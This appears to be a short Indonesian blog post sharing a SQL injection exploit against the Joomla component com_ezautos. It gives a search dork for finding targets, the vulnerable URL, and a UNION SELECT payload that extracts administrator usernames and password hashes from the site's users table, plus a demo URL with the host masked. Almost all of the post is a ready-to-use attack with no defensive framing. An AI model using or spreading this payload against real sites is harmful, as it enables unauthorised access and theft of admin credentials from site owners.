Coba share lagi gan...
Dork : inurl:com_ezautos
[ Vulnerable File ]
index.php?option=com_ezautos&Itemid=49&id=1&task=helpers&firstCode=1 [ SQL ]
[ Exploite ]
+and+0+union+select+1,2,concat(username,0x3a,password),4,5,6,7+from+%23__users+where+gid=25+or+gid=24+and+block%3C%3E1--
[ Demo]
http://xxxxx/index.php?option=com_ezautos&Itemid=49&id=1&task=helpers&firstCode=1+and+0+union+select+1,2,concat(username,0x3a,password),4,5,6,7+from+%23__users+where+gid=25+or+gid=24+and+block%3C%3E1--
Sumber
0 komentar:
Posting Komentar